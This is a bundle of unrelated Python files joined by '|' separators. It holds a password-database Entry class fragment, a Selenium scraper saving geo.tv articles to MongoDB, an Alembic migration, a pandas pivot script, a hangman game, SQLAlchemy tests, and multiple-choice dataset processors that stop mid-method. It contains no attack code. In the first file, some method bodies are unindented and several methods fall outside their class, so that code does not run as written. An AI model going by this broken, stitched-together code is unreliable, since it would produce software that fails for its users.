            self._element.append(
                E.AutoType(
                    E.Enabled(str(autotype_enabled)),
                    E.DataTransferObfuscation('0'),
                    E.DefaultSequence(str(autotype_sequence))
                )
            )
        else:
            assert type(element) in [_Element, Element, ObjectifiedElement], \
                'The provided element is not an LXML Element, but a {}'.format(
                    type(element)
                )
            assert element.tag == 'Entry', 'The provided element is not an Entry '\
                'element, but a {}'.format(element.tag)
            self._element = element
def _get_string_field(self, key):
field = self._xpath('String/Key[text()="{}"]/../Value'.format(key), first=True)
if field is not None:
return field.text
    def _set_string_field(self, key, value):
        """Replace (or create) the String field named *key* with *value*."""
        field = self._xpath('String/Key[text()="{}"]/..'.format(key), first=True)
        # Remove any existing field of the same key before appending the new one.
        if field is not None:
            self._element.remove(field)
        self._element.append(E.String(E.Key(key), E.Value(value)))
def _get_string_field_keys(self, exclude_reserved=False):
results = [x.find('Key').text for x in self._element.findall('String')]
if exclude_reserved:
return [x for x in results if x not in reserved_keys]
else:
return results
    @property
    def attachments(self):
        # All binary attachments directly under this entry (non-recursive).
        return self._kp.find_attachments(
            element=self,
            filename='.*',
            regex=True,
            recursive=False
        )

    def add_attachment(self, id, filename):
        """Attach the binary with database id *id* under *filename*."""
        element = E.Binary(
            E.Key(filename),
            E.Value(Ref=str(id))
        )
        self._element.append(element)
        return pykeepass.attachment.Attachment(element=element, kp=self._kp)

    def delete_attachment(self, attachment):
        """Remove *attachment* from this entry."""
        attachment.delete()

    def deref(self, attribute):
        """Resolve {REF:...} field references in the given attribute's value."""
        return self._kp.deref(getattr(self, attribute))

    @property
    def title(self):
        return self._get_string_field('Title')

    @title.setter
    def title(self, value):
        return self._set_string_field('Title', value)

    @property
    def username(self):
        return self._get_string_field('UserName')

    @username.setter
    def username(self, value):
        return self._set_string_field('UserName', value)

    @property
    def password(self):
        return self._get_string_field('Password')

    @password.setter
    def password(self, value):
        return self._set_string_field('Password', value)

    @property
    def url(self):
        return self._get_string_field('URL')

    @url.setter
    def url(self, value):
        return self._set_string_field('URL', value)

    @property
    def notes(self):
        return self._get_string_field('Notes')

    @notes.setter
    def notes(self, value):
        return self._set_string_field('Notes', value)

    @property
    def icon(self):
        return self._get_subelement_text('IconID')

    @icon.setter
    def icon(self, value):
        return self._set_subelement_text('IconID', value)

    @property
    def tags(self):
        # Stored as a single ';'-separated string; exposed as a list.
        val = self._get_subelement_text('Tags')
        return val.split(';') if val else val

    @tags.setter
    def tags(self, value):
        # Accept both str or list
        v = ';'.join(value if type(value) is list else [value])
        return self._set_subelement_text('Tags', v)

    @property
    def history(self):
        # Previous revisions of this entry, wrapped as Entry objects.
        if self._element.find('History') is not None:
            return [Entry(element=x, kp=self._kp) for x in self._element.find('History').findall('Entry')]
        else:
            return []

    @history.setter
    def history(self, value):
        raise NotImplementedError()
    @property
    def autotype_enabled(self):
        # NOTE(review): raises AttributeError if the entry has no
        # AutoType/Enabled element -- confirm all entries carry one.
        enabled = self._element.find('AutoType/Enabled')
        if enabled.text is not None:
            return enabled.text == 'True'

    @autotype_enabled.setter
    def autotype_enabled(self, value):
        enabled = self._element.find('AutoType/Enabled')
        if value is not None:
            enabled.text = str(value)
        else:
            enabled.text = None

    @property
    def autotype_sequence(self):
        sequence = self._element.find('AutoType/DefaultSequence')
        return sequence.text if sequence is not None else None

    @autotype_sequence.setter
    def autotype_sequence(self, value):
        # NOTE(review): assumes AutoType/DefaultSequence exists -- confirm.
        self._element.find('AutoType/DefaultSequence').text = value

    @property
    def autotype_associations(self):
        # Map window title pattern -> keystroke sequence (None = default).
        associations = self._xpath('AutoType/Association')
        result = {}
        for a in associations:
            result[a.find('Window').text] = getattr(
                a.find('KeystrokeSequence'),
                'text',
                None
            )
        return result

    @property
    def is_a_history_entry(self):
        # True when this entry lives inside another entry's History element.
        parent = self._element.getparent()
        if parent is not None:
            return parent.tag == 'History'
        return False
@property
def path(self):
    """Return the human-readable path of this entry in the database.

    History entries yield a '[History of: <title>]' marker instead of a
    real path.  Returns None when the entry has no parent group.  The
    root group itself never appears in the path.
    """
    # The root group is an orphan
    if self.is_a_history_entry:
        # Two levels up: History element -> the entry that owns it.
        pentry = Entry(
            element=self._element.getparent().getparent(),
            kp=self._kp
        ).title
        return '[History of: {}]'.format(pentry)
    if self.parentgroup is None:
        return None
    # Walk upward, prepending each group name until the root is reached.
    p = self.parentgroup
    ppath = ''
    while p is not None and not p.is_root_group:
        if p.name is not None:  # dont make the root group appear
            ppath = '{}/{}'.format(p.name, ppath)
        p = p.parentgroup
    return '{}{}'.format(ppath, self.title)
def set_custom_property(self, key, value):
    """Set a user-defined string field; `key` must not be a reserved name."""
    # NOTE(review): `assert` disappears under `python -O`; raising
    # ValueError would survive optimization, but callers may rely on
    # AssertionError here.
    assert key not in reserved_keys, '{} is a reserved key'.format(key)
    return self._set_string_field(key, value)
def get_custom_property(self, key):
    """Return the value of a user-defined (non-reserved) string field."""
    assert key not in reserved_keys, '{} is a reserved key'.format(key)
    return self._get_string_field(key)
def delete_custom_property(self, key):
    """Remove a user-defined string field; raise AttributeError if absent."""
    if key not in self._get_string_field_keys(exclude_reserved=True):
        raise AttributeError('No such key: {}'.format(key))
    # Locate the parent <String> element of the matching <Key>.
    prop = self._xpath('String/Key[text()="{}"]/..'.format(key), first=True)
    if prop is None:
        raise AttributeError('Could not find property element')
    self._element.remove(prop)
@property
def custom_properties(self):
    """Return all user-defined (non-reserved) string fields as a dict."""
    return {
        key: self._get_string_field(key)
        for key in self._get_string_field_keys(exclude_reserved=True)
    }
def ref(self, attribute):
    """Create a KeePass field reference string for one of this entry's
    attributes, keyed by this entry's UUID."""
    field_codes = {
        'title': 'T',
        'username': 'U',
        'password': 'P',
        'url': 'A',
        'notes': 'N',
        'uuid': 'I',
    }
    code = field_codes[attribute]
    return '{{REF:{}@I:{}}}'.format(code, self.uuid.hex.upper())
def touch(self, modify=False):
    """Refresh the entry's access timestamp (and its modification
    timestamp as well when ``modify`` is true)."""
    timestamp = datetime.now()
    self.atime = timestamp
    if modify:
        self.mtime = timestamp
def save_history(self):
    '''
    Save the entry in its history
    '''
    # Deep-copy the current element so later edits don't mutate the
    # archived snapshot.
    archive = deepcopy(self._element)
    hist = archive.find('History')
    if hist is not None:
        # Strip the copy's own History so snapshots don't nest, then
        # append the snapshot to the live element's History list.
        archive.remove(hist)
        self._element.find('History').append(archive)
    else:
        # First snapshot: create the History container.
        history = Element('History')
        history.append(archive)
        self._element.append(history)
def __str__(self):
    """Human-readable one-line summary: path and username."""
    return 'Entry: "{path} ({username})"'.format(path=self.path, username=self.username)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 12 16:40:22 2020
@author: salman
"""
import selenium
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import os
from os import path
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import presence_of_element_located
from selenium.webdriver.support import expected_conditions as EC
import requests
import time
import pymongo
import re
from pymongo import MongoClient
from datetime import date
# Configure a fresh (incognito) Chrome session at a fixed window size so
# page layout and the XPaths below stay reproducible between runs.
chrome_options = Options()
chrome_options.add_argument("--incognito")
chrome_options.add_argument("--window-size=1920x1080")
# NOTE(review): hard-coded, machine-specific driver path -- consider
# reading it from configuration or the system PATH instead.
Path=r"C:\Users\salman\desktop\chromedriver\chromedriver.exe"
driver = webdriver.Chrome(options=chrome_options, executable_path=Path)
# Landing page listing the latest articles to crawl.
url="https://www.geo.tv/latest-news"
today = date.today()  # used below to keep only articles published today
class geoC:
    """Crawler for geo.tv: collects article links into a MongoDB frontier,
    then scrapes today's articles (text, title, images) into `collection`.
    """

    # Class-body setup: runs once at import time and publishes the DB
    # handles as module globals for the methods below.
    def connect_db():
        # Local MongoDB instance on the default port.
        client = MongoClient("localhost", 27017)
        return client
    client = connect_db()
    global db
    global collection
    db = client['geoDB']  # database creation in mongodb
    collection=db['geoT']  # document (collection) creation
    global download_images
    global save_image_to_file
    global unvisitedURLs
    unvisitedURLs=db['unvisitedURLs']  # frontier: links not yet scraped
    global visitedURLs
    visitedURLs=db['visitedURLs']  # links already processed

    def linksCrawl(self):
        """Collect article links from the latest-news page into the
        unvisitedURLs frontier, skipping links already known."""
        driver.get(url)
        time.sleep(3)  # crude wait for the page to finish rendering
        try:
            elements = driver.find_elements_by_xpath("//a[@href]")  # finding all href in page
            for x in elements:
                # print(driver.current_url)
                string=x.get_attribute("href")  # all href links
                if(string.startswith("https://www.geo.tv/latest/")):
                    # Only enqueue links present in neither collection.
                    if(db.visitedURLs.find({"urls":string}).count()==0 and db.unvisitedURLs.find({"urls":string}).count()==0 ):
                        data={"urls":string}
                        print(string)
                        unvisitedURLs.insert_one(data)
                else:
                    pass
        except Exception as e:
            # NOTE(review): swallowing every exception hides scraper
            # breakage -- at least log `e`.
            pass

    def crawl(self,url,urlList):
        """Visit each frontier URL; store today's articles (story text,
        title, downloaded images) in `collection`."""
        try:
            documents = urlList
            for k,doc in enumerate( documents,start=0):
                mainUrl=doc["urls"]
                driver.get(mainUrl)
                # Move the link from the frontier to the visited set.
                unvisitedURLs.delete_many({"urls":mainUrl})
                visitedURLs.insert_one({"urls":mainUrl})
                time.sleep(3)
                #----------------------------getting date----------------------------
                try:
                    # Brittle absolute XPath to the article's date block.
                    dateElement=driver.find_element_by_xpath("/html/body/div[2]/section/div/div[3]/div[1]/div[2]")
                    dateElementP=dateElement.find_element_by_tag_name("p").get_attribute("textContent")
                    dateElementProcessed = dateElementP.split("\n")[2]
                    dateArray=dateElementProcessed.split(" ")
                    Articledate=dateArray[1]+" "+dateArray[2]+" "+dateArray[3]
                    #-------------------------------article=date------------------------
                    print("article date: ",Articledate)
                    #--------------------------------todays=date--------------------------
                    todaysDate=today.strftime("%b %d, %Y")
                    print("todays date",todaysDate)
                    if(todaysDate==Articledate):  #==============comparison=of=dates================
                        storyContent=driver.find_element_by_class_name("story-area")
                        #===========================paragraphs===========================
                        paragraphs=storyContent.find_elements_by_tag_name("p")
                        paragraphBody=""
                        for para in paragraphs:
                            paragraphBody=paragraphBody+para.text
                            print(para.text)
                        #================================story title====================================
                        titleElement=storyContent.find_element_by_tag_name("h1")
                        title=titleElement.text
                        print("title ",title)
                        #==================================IMAGE=========================================
                        i=0
                        imgTag=storyContent.find_elements_by_tag_name("img")
                        for img in imgTag:
                            imageLink=img.get_attribute("src")
                            print("image link: ",imageLink)
                            dirname=re.sub("[\.]", "",imageLink)
                            response = requests.get(imageLink)
                            currentDirectory = os.getcwd()
                            i=i+1
                            # Image file name encodes article index k and image index i.
                            with open('geoImage'+str(k)+" "+str(i)+'.jpg', 'wb') as out_file:
                                out_file.write(response.content)
                            imageDir=currentDirectory+'/'+"geoImage"+str(k)+" "+str(i)+'.jpg'
                            # NOTE(review): inserting inside the image loop stores one
                            # copy of the article per image -- confirm the duplication
                            # is intended.
                            collection.insert_one({"story":paragraphBody,"title":title,"url":mainUrl,"date": Articledate,"imageDir":imageDir})
                except Exception as e:
                    print(e)
                    unvisitedURLs.delete_many({"urls":mainUrl})
                    visitedURLs.insert_one({"urls":mainUrl})
            # NOTE(review): closes the shared driver after the whole batch;
            # callers cannot crawl again without recreating it.
            driver.close()
        except Exception as e:
            pass
|
"""add rank to issue
Revision ID: 4d5027f9faac
Revises: 6d3439e14660
Create Date: 2019-03-23 13:37:47.267698
"""
from alembic import op
import sqlalchemy as sa
from pabu.tools import get_table
# revision identifiers, used by Alembic.
revision = '4d5027f9faac'  # this migration
down_revision = '6d3439e14660'  # parent migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Add the nullable integer 'rank' column to issues and backfill it.

    Each existing issue gets rank == its id, giving a stable initial
    ordering without violating the nullable constraint during the ALTER.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('issues', sa.Column('rank', sa.Integer(), nullable=True))
    issues = get_table(op.get_bind(), 'issues')
    op.execute(issues.update().values(rank = issues.c.id))
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration by dropping the 'rank' column (data is lost)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('issues', 'rank')
    # ### end Alembic commands ###
|
import pandas as pd
import numpy as np
# Load the source workbook; expects a 'Sales' value column plus one or
# more category columns (e.g. State/City/Product).
df = pd.read_excel("input.xlsx")
print(df)
series_obj = list(df.columns)
# All columns except the last are offered as grouping levels --
# assumes the value column ('Sales') is always last; TODO confirm.
print("Choose sequence From this :- ",*series_obj[:-1])
user_series_ip = []
print()
print("Enter timeseries sequence: ")
# Ask the user to order every grouping column for the pivot hierarchy.
for i in range(len(series_obj)-1):
    x = input("=> ")
    user_series_ip.append(x)
print(*user_series_ip)
table = pd.pivot_table(df,index=user_series_ip,values="Sales",aggfunc=np.sum)#,columns=["State","City","Product","Sales"]
#print(table)
df1 = pd.DataFrame(table)
#print(df1)
df1.to_excel("output.xlsx")
# Re-read the written pivot so the multi-index is rendered as columns.
df2 = pd.read_excel("output.xlsx")
print(df2)
count_TS = 0
for i in df2.columns:
    if i =="":
        continue
    count_TS += df2[i].count()
# NOTE(review): the formula adds 1 and subtracts the Sales count --
# presumably to count only index cells; verify against expected output.
print("Total Timeseries = ",count_TS + 1 -(df2['Sales'].count()))
|
import random
def play():
    """Run one eight-round letter-guessing session of hangman.

    Picks a random word, shows the masked word each round, and records
    correct guesses.  There is deliberately no early-win detection or
    lives tracking yet (staged exercise).
    """
    words = ["python", "java", "kotlin", "javascript"]
    word = random.choice(words)
    found = set()  # letters guessed correctly so far
    print("H A N G M A N")
    print()
    for i in range(8):
        print(generate_display(word, found))
        guess = input("Input a letter: ")
        if guess in word:
            found.add(guess)
        else:
            print("That letter doesn't appear in the word")
        print()
    print("Thanks for playing!")
    print("We'll see how well you did in the next stage")
def generate_display(word, found):
    """Mask `word`, revealing only the letters present in `found`."""
    return "".join(letter if letter in found else "-" for letter in word)
play()
|
#!/usr/bin/env python3.7
"""
Mastering Object-Oriented Python 2e
Code Examples for Mastering Object-Oriented Python 2nd Edition
Chapter 17. Example 2.
"""
import unittest
# SQLite testing
# =========================
# This is integration testing, not unit testing.
# Integration means we use the database
# instead of isolating our code from the database.
# A more formal unit test would mock the database layer.
# SQLAlchemy ORM classes
from typing import Any
from Chapter_12.ch12_ex4 import Base, Blog, Post, Tag, assoc_post_tag
import datetime
import sqlalchemy.exc
from sqlalchemy import create_engine
def build_test_db(name="sqlite:///./data/ch17_blog.db"):
    """
    Create Test Database and Schema
    """
    # echo=True logs every emitted SQL statement, handy when a test fails.
    engine = create_engine(name, echo=True)
    # Drop-then-create gives each test run a pristine schema.
    Base.metadata.drop_all(engine)
    Base.metadata.create_all(engine)
    return engine
# Unittest Case
from sqlalchemy.orm import sessionmaker, Session
class Test_Blog_Queries(unittest.TestCase):
    """Integration tests: real ORM queries against a seeded SQLite DB."""

    # Session factory shared by the class; per-test session set in setUp.
    Session: Any
    session: Session

    # NOTE(review): unittest invokes setUpClass on the class; @staticmethod
    # works here only because the method takes no arguments --
    # @classmethod is the conventional choice.
    @staticmethod
    def setUpClass() -> None:
        # Build a fresh schema and seed it once for the whole class:
        # four tags, one blog with two tagged posts, one empty blog.
        engine = build_test_db()
        Test_Blog_Queries.Session = sessionmaker(bind=engine)
        session = Test_Blog_Queries.Session()
        tag_rr = Tag(phrase="#RedRanger")
        session.add(tag_rr)
        tag_w42 = Tag(phrase="#Whitby42")
        session.add(tag_w42)
        tag_icw = Tag(phrase="#ICW")
        session.add(tag_icw)
        tag_mis = Tag(phrase="#Mistakes")
        session.add(tag_mis)
        blog1 = Blog(title="Travel 2013")
        session.add(blog1)
        b1p1 = Post(
            date=datetime.datetime(2013, 11, 14, 17, 25),
            title="Hard Aground",
            rst_text="""Some embarrassing revelation. Including ☹ and ⚓︎""",
            blog=blog1,
            tags=[tag_rr, tag_w42, tag_icw],
        )
        session.add(b1p1)
        b1p2 = Post(
            date=datetime.datetime(2013, 11, 18, 15, 30),
            title="Anchor Follies",
            rst_text="""Some witty epigram. Including ☺ and ☀︎︎""",
            blog=blog1,
            tags=[tag_rr, tag_w42, tag_mis],
        )
        session.add(b1p2)
        blog2 = Blog(title="Travel 2014")
        session.add(blog2)
        session.commit()

    def setUp(self) -> None:
        # Each test gets its own session over the shared seeded engine.
        self.session = Test_Blog_Queries.Session()

    def test_query_eqTitle_should_return1Blog(self) -> None:
        """Tests schema definition"""
        results = self.session.query(Blog).filter(Blog.title == "Travel 2013").all()
        self.assertEqual(1, len(results))
        self.assertEqual(2, len(results[0].entries))

    def test_query_likeTitle_should_return2Blog(self) -> None:
        """Tests SQLAlchemy, and test data"""
        results = self.session.query(Blog).filter(Blog.title.like("Travel %")).all()
        self.assertEqual(2, len(results))

    def test_query_eqW42_tag_should_return2Post(self) -> None:
        # Join through the association table to filter posts by tag.
        results = self.session.query(Post).join(assoc_post_tag).join(Tag).filter(
            Tag.phrase == "#Whitby42"
        ).all()
        self.assertEqual(2, len(results))

    def test_query_eqICW_tag_should_return1Post(self) -> None:
        results = self.session.query(Post).join(assoc_post_tag).join(Tag).filter(
            Tag.phrase == "#ICW"
        ).all()
        # print( [r.title for r in results] )
        self.assertEqual(1, len(results))
        self.assertEqual("Hard Aground", results[0].title)
        self.assertEqual("Travel 2013", results[0].blog.title)
        self.assertEqual(
            set(["#RedRanger", "#Whitby42", "#ICW"]),
            set(t.phrase for t in results[0].tags),
        )
# Make a suite of the testcases
def suite8() -> unittest.TestSuite:
    """Build a suite containing every Test_Blog_Queries test case."""
    loader = unittest.defaultTestLoader
    return unittest.TestSuite(loader.loadTestsFromTestCase(Test_Blog_Queries))
# Run the integration suite when executed as a script.
if __name__ == "__main__":
    t = unittest.TextTestRunner()
    t.run(suite8())
# Expose any doctest-style names to doctest.testmod below.
__test__ = {name: value for name, value in locals().items() if name.startswith("test_")}
if __name__ == "__main__":
    import doctest
    doctest.testmod(verbose=False)
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Multiple choice fine-tuning: utilities to work with multiple choice tasks of reading comprehension """
import csv
import glob
import json
import logging
import os
from collections import defaultdict
from typing import List
import tqdm
from transformers import PreTrainedTokenizer
import torch
from torch.utils.data import Dataset
from collections import Counter
logger = logging.getLogger(__name__)
class InputExample(object):
    """A single training/test example for multiple choice"""

    def __init__(self, example_id, question, contexts, endings, label=None):
        """Constructs a InputExample.

        Args:
            example_id: Unique id for the example.
            contexts: list of str. The untokenized text of the first sequence (context of corresponding question).
            question: string. The untokenized text of the second sequence (question).
            endings: list of str. multiple choice's options. Its length must be equal to contexts' length.
            label: (Optional) string. The label of the example. This should be
                specified for train and dev examples, but not for test examples.
        """
        self.example_id = example_id
        self.question = question
        self.contexts = contexts
        self.endings = endings
        self.label = label
class InputFeatures(object):
    """Tokenized features for one example: one dict per answer choice."""

    def __init__(self, example_id, choices_features, label):
        self.example_id = example_id
        # Each choice arrives as an (input_ids, input_mask, segment_ids)
        # triple; store it as a named dict for downstream access.
        self.choices_features = []
        for input_ids, input_mask, segment_ids in choices_features:
            self.choices_features.append(
                {"input_ids": input_ids, "input_mask": input_mask, "segment_ids": segment_ids}
            )
        self.label = label
class DataProcessor(object):
    """Base class for data converters for multiple choice data sets."""

    def get_train_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the train set."""
        raise NotImplementedError()

    def get_dev_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the dev set."""
        raise NotImplementedError()

    def get_test_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the test set."""
        raise NotImplementedError()

    def get_labels(self):
        """Gets the list of labels for this data set."""
        raise NotImplementedError()
class RaceProcessor(DataProcessor):
    """Processor for the RACE data set."""

    def get_train_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} train".format(data_dir))
        high = os.path.join(data_dir, "train/high")
        middle = os.path.join(data_dir, "train/middle")
        high = self._read_txt(high)
        middle = self._read_txt(middle)
        return self._create_examples(high + middle, "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} dev".format(data_dir))
        high = os.path.join(data_dir, "dev/high")
        middle = os.path.join(data_dir, "dev/middle")
        high = self._read_txt(high)
        middle = self._read_txt(middle)
        return self._create_examples(high + middle, "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} test".format(data_dir))
        high = os.path.join(data_dir, "test/high")
        middle = os.path.join(data_dir, "test/middle")
        high = self._read_txt(high)
        middle = self._read_txt(middle)
        return self._create_examples(high + middle, "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1", "2", "3"]

    def _read_txt(self, input_dir):
        # RACE stores one JSON document per *.txt file; keep the file
        # path as the example id.
        lines = []
        files = glob.glob(input_dir + "/*txt")
        for file in tqdm.tqdm(files, desc="read files"):
            with open(file, "r", encoding="utf-8") as fin:
                data_raw = json.load(fin)
                data_raw["race_id"] = file
                lines.append(data_raw)
        return lines

    def _create_examples(self, lines, set_type):
        """Creates examples for the training and dev sets."""
        examples = []
        for (_, data_raw) in enumerate(lines):
            race_id = "%s-%s" % (set_type, data_raw["race_id"])
            article = data_raw["article"]
            for i in range(len(data_raw["answers"])):
                # Answers are letters 'A'-'D'; convert to "0"-"3".
                truth = str(ord(data_raw["answers"][i]) - ord("A"))
                question = data_raw["questions"][i]
                options = data_raw["options"][i]
                examples.append(
                    InputExample(
                        example_id=race_id,
                        question=question,
                        contexts=[article, article, article, article],  # this is not efficient but convenient
                        endings=[options[0], options[1], options[2], options[3]],
                        label=truth,
                    )
                )
        return examples
class SwagProcessor(DataProcessor):
    """Processor for the SWAG data set."""

    def get_train_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} train".format(data_dir))
        return self._create_examples(self._read_csv(os.path.join(data_dir, "train.csv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} dev".format(data_dir))
        return self._create_examples(self._read_csv(os.path.join(data_dir, "val.csv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} dev".format(data_dir))
        # SWAG's test split has no label column, so testing is
        # unsupported; the return below is intentionally unreachable.
        raise ValueError(
            "For swag testing, the input file does not contain a label column. It can not be tested in current code"
            "setting!"
        )
        return self._create_examples(self._read_csv(os.path.join(data_dir, "test.csv")), "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1", "2", "3"]

    def _read_csv(self, input_file):
        with open(input_file, "r", encoding="utf-8") as f:
            return list(csv.reader(f))

    def _create_examples(self, lines: List[List[str]], type: str):
        """Creates examples for the training and dev sets."""
        if type == "train" and lines[0][-1] != "label":
            raise ValueError("For training, the input file must contain a label column.")
        examples = [
            InputExample(
                example_id=line[2],
                question=line[5],  # in the swag dataset, the
                # common beginning of each
                # choice is stored in "sent2".
                contexts=[line[4], line[4], line[4], line[4]],
                endings=[line[7], line[8], line[9], line[10]],
                label=line[11],
            )
            for line in lines[1:]  # we skip the line with the column names
        ]
        return examples
class ArcProcessor(DataProcessor):
    """Processor for the ARC data set (request from allennlp)."""

    def get_train_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} train".format(data_dir))
        return self._create_examples(self._read_json(os.path.join(data_dir, "train.jsonl")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        logger.info("LOOKING AT {} dev".format(data_dir))
        return self._create_examples(self._read_json(os.path.join(data_dir, "dev.jsonl")), "dev")

    def get_test_examples(self, data_dir):
        logger.info("LOOKING AT {} test".format(data_dir))
        return self._create_examples(self._read_json(os.path.join(data_dir, "test.jsonl")), "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1", "2", "3"]

    def _read_json(self, input_file):
        # One JSON object per line (jsonl); parsing happens later.
        with open(input_file, "r", encoding="utf-8") as fin:
            lines = fin.readlines()
        return lines

    def _create_examples(self, lines, type):
        """Creates examples for the training and dev sets."""

        # There are two types of labels. They should be normalized
        def normalize(truth):
            # Accept letter labels ('A'-'D') or 1-based digits ('1'-'4');
            # return a 0-based index, or None when unrecognised.
            if truth in "ABCD":
                return ord(truth) - ord("A")
            elif truth in "1234":
                return int(truth) - 1
            else:
                logger.info("truth ERROR! %s", str(truth))
                return None

        examples = []
        three_choice = 0
        four_choice = 0
        five_choice = 0
        other_choices = 0
        # we deleted example which has more than or less than four choices
        for line in tqdm.tqdm(lines, desc="read arc data"):
            data_raw = json.loads(line.strip("\n"))
            if len(data_raw["question"]["choices"]) == 3:
                three_choice += 1
                continue
            elif len(data_raw["question"]["choices"]) == 5:
                five_choice += 1
                continue
            elif len(data_raw["question"]["choices"]) != 4:
                other_choices += 1
                continue
            four_choice += 1
            # normalize() returns None on bad labels; str(None) == "None",
            # hence the string comparison in the assert below.
            truth = str(normalize(data_raw["answerKey"]))
            assert truth != "None"
            question_choices = data_raw["question"]
            question = question_choices["stem"]
            id = data_raw["id"]
            options = question_choices["choices"]
            if len(options) == 4:
                examples.append(
                    InputExample(
                        example_id=id,
                        question=question,
                        contexts=[
                            options[0]["para"].replace("_", ""),
                            options[1]["para"].replace("_", ""),
                            options[2]["para"].replace("_", ""),
                            options[3]["para"].replace("_", ""),
                        ],
                        endings=[options[0]["text"], options[1]["text"], options[2]["text"], options[3]["text"]],
                        label=truth,
                    )
                )

        if type == "train":
            assert len(examples) > 1
            assert examples[0].label is not None
        logger.info("len examples: %s}", str(len(examples)))
        logger.info("Three choices: %s", str(three_choice))
        logger.info("Five choices: %s", str(five_choice))
        logger.info("Other choices: %s", str(other_choices))
        logger.info("four choices: %s", str(four_choice))
        return examples
class TemporalProcessorForBCE(DataProcessor):
    """MC-TACO style processor that groups all candidate answers sharing
    one (sentence, question) pair into a single multi-label example."""

    def _read_lines(self, input_file):
        # Raw lines, trailing newline included.
        with open(input_file, "r", encoding="utf-8") as fin:
            lines = fin.readlines()
        return lines

    def get_train_examples(self, data_dir, train_filename="norm_dev_3783.tsv"):
        print(train_filename)
        return self._create_examples(self._read_lines(os.path.join(data_dir, train_filename)), "train")

    def get_dev_examples(self, data_dir, val_filename="norm_test_9442.tsv"):
        print(val_filename)
        return self._create_examples(self._read_lines(os.path.join(data_dir, val_filename)), "dev")

    def get_labels(self):
        return ["yes", "no"]

    def _create_examples(self, lines, type):
        examples = []
        # try to concat lines with text_a the same
        instance_dict = defaultdict(list)
        for (i, line) in enumerate(lines):
            group = line.split("\t")
            id = "%s-%s" % (type, i)
            # Columns: sentence, question, candidate answer, label.
            text_a = group[0] + " " + group[1]
            text_b = group[2]
            # NOTE(review): readlines() keeps the trailing newline, so
            # group[3] may be e.g. "yes\n" unless the file has a further
            # tab-separated column -- confirm labels are clean before the
            # label_map lookup in convert_examples_to_features.
            label = group[3]
            instance_dict[text_a].append([id, text_b, label])
        # One example per context, carrying parallel endings and labels.
        for k, v in instance_dict.items():
            examples.append(
                InputExample(
                    example_id=v[0][0],
                    question="",
                    contexts=[k]*len(v),
                    endings=[v[i][1] for i in range(len(v))],
                    label=[v[i][2] for i in range(len(v))]
                )
            )
        return examples
class TemporalProcessor(DataProcessor):
    """MC-TACO style processor where every TSV line becomes its own
    single-choice InputExample.

    Input lines are tab-separated: sentence, question, candidate answer,
    label ("yes"/"no").  Unlike TemporalProcessorForBCE, no grouping by
    context is performed.
    """

    def _read_lines(self, input_file):
        """Read the raw lines (trailing newline included) of a UTF-8 file."""
        with open(input_file, "r", encoding="utf-8") as fin:
            lines = fin.readlines()
        return lines

    def get_train_examples(self, data_dir, train_filename="dev_3783.tsv"):
        """Build training examples from `train_filename` under `data_dir`."""
        return self._create_examples(self._read_lines(os.path.join(data_dir, train_filename)), "train")

    def get_dev_examples(self, data_dir, val_filename="test_9442.tsv"):
        """Build evaluation examples from `val_filename` under `data_dir`."""
        return self._create_examples(self._read_lines(os.path.join(data_dir, val_filename)), "dev")

    def get_labels(self):
        """The two possible answers for this task."""
        return ["yes", "no"]

    def _create_examples(self, lines, type):
        """Turn each TSV line into a one-context, one-ending InputExample.

        Fixed: removed an unused `instance_dict` accumulator (and its
        stale "concat lines" comment) copied from TemporalProcessorForBCE
        but never read here.
        """
        examples = []
        for (i, line) in enumerate(lines):
            group = line.split("\t")
            id = "%s-%s" % (type, i)
            # Sentence + question form the context; the candidate answer
            # is the single "ending".
            text_a = group[0] + " " + group[1]
            text_b = group[2]
            label = group[3]
            examples.append(
                InputExample(
                    example_id=id,
                    question="",
                    contexts=[text_a],
                    endings=[text_b],
                    label=label,
                )
            )
        return examples
class PiqaProcessor(DataProcessor):
    """Processor for the PIQA data set (two-choice physical reasoning),
    optionally augmented with retrieved evidence text."""

    def get_train_examples(self, data_dir, train_filename):
        """See base class."""
        logger.info("LOOKING AT {} train and searching for {}".format(data_dir, train_filename))
        return self._create_examples(self._read_lines(train_filename), self._read_lines(os.path.join(data_dir, "train-labels.lst")), "train")

    def get_dev_examples(self, data_dir, val_filename):
        """See base class."""
        logger.info("LOOKING AT {} dev and searching for {}".format(data_dir, val_filename))
        return self._create_examples(self._read_lines(val_filename), self._read_lines(os.path.join(data_dir, "valid-labels.lst")), "dev")

    def get_test_examples(self, data_dir, test_filename):
        logger.info("LOOKING AT {} test".format(data_dir))
